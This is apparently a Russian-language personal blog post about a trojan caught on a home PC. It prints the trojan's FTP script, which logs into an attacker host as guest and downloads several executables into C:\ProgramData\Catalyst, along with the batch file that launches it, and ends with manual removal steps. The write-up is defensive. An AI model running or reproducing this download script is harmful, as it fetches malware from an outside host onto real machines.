Борем троян руками

Пришел домой после тяжелого трудового дня, включил компьютер и пронаблюдал, как вполне шттный бинарник ftp просится в интернеты и заблокирован брандмауэром, которые доморощенные админы так любят вырубать. Доступ конечно же я запретил и решил разобраться, а потом уже поужинать ;)

Для начала скачал Process Explorer (спасибо, Марк Руссинович)

Отсюда видно, что запущен процесс с конфигурацией, взятой из файла config, в некой темповой директории. Идём в директорию и наблюдаем 2 файла:
config

open 02adm2.chickenkiller.com
guest
guest
binary
cd amd2
get upd.exe C:\ProgramData\Catalyst\upd.exe
get upd1.exe C:\ProgramData\Catalyst\upd1.exe
get color.exe C:\ProgramData\Catalyst\color.exe
get mnr.exe C:\ProgramData\Catalyst\mnr.exe
quit
exit

copi.bat

FTP -s:config

Что делает-понятно. Каталист потом сам же скаченые файлы и запустит.
Директорию удалил, а вот как запустился этот copi.bat, я не нашел... Возможно прописан был на один запуск и самоудаление. Надеюсь :D
P.S. Ни MSE, ни Касперский угроз не обнаружили.
UPD:
1.Удалите запись в реестре в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run с именем AMD Catalyst
2. Удалите директорию C:\ProgramData\Catalyst